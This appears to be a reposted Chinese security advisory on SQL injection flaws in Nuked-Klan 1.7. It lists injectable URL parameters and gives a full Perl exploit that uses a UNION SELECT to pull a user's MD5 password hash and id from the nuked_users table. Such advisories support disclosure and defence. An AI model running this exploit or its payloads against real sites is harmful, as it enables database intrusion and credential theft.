首页 > > 服务器技术 > 安全防护 >

Nuked Klan多个远程SQL注入漏洞

2008-04-09 04:15:40来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Nuked Klan多个远程SQL注入漏洞

发布日期:2005-10-25
更新日期:2005-10-25

受影响系统:
Nuked-Klan Nuked-Klan 1.7
描述:
BUGTRAQ ID: 15181

Nuked Klan是一款用于"clans"的PHP网关程序。

Nuked Klan中存在多个SQL注入漏洞。由于没有正确的验证用户输入,攻击者可以通过类似于以下的URL完全入侵数据库系统:

http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]'
http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=1'
http://www.example.com/nk/index.php?file=Forum&page=viewtopic&forum_id='[SQL]&thread_id='[SQL]
http://www.example.com/nk/index.php?file=Links&op=description&link_id='[SQL]
http://www.example.com/nk/index.php?file=Sections&op=article&artid='[SQL]
http://www.example.com/nk/index.php?file=Download&op=description&dl_id='[SQL]

<*来源:papipsycho (papipsycho@hotmail)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113017972620427&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
use LWP::Simple;

if (@ARGV != 2)
{
print "\n Nuked klan 1.7: Remote Exploit\n";
print "---------------------------------------------\n\n";
print " Coded By Papipsycho for G00t R0t ? \n Contact: \
papipsycho@hotmail.com\n\n"; print "[!] usage: perl $0 [host] [user]\n";
print "[?] exam: perl $0 http://127.0.0.1/nk/ papipsycho\n\n";
print "Result:\n";
print "[ ]user: papipsycho\n";
print "[ ]pass(md5): 05632060d4357d8927n28df514a1fb27\n";
print "[ ]id: sliN4piN4t6r4tirlX6b\n\n";
print "---------------------------------------------\n\n";
exit ();
}

$adr = $ARGV[0]; # http://127.0.0.1/nk/
$user = $ARGV[1]; # user

$phase1 = "index.php?file=Links&op=description&link_id=1' UNION SELECT id, pass, \
pseudo, id, pass ,mail, niveau, count FROM `nuked_users` where pseudo = '"; $phase2 = \
"' ORDER BY id DESC /*"; $url = $adr.$phase1.$user.$phase2;
$content = get($url);
print "[ ]user: $user\n";
print "[ ]pass(md5): ";
print $content =~ /(\w{32})/;
print "\n[ ]id: ";
print $content =~ /(\w{20})/;

建议:
厂商补丁:

Nuked-Klan
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.nuked-klan.org

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:SUSE Linux Permissions软件包CHKSTAT不安全权限处理漏洞

下一篇:ZipGenius多个文档格式文件名溢出漏洞

相关文章

IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设

网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源

网站联盟: 联盟新闻 联盟介绍 联盟点评 网赚技巧

行业资讯: 搜索引擎 网络游戏 电子商务 广告传媒

网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护

软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计: Java技术 C/C++ VB delphi

网络知识: 网络协议 网络安全 网络管理 组网方案 Cisco技术

操作系统: Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条
最新资讯
热门关注
热门标签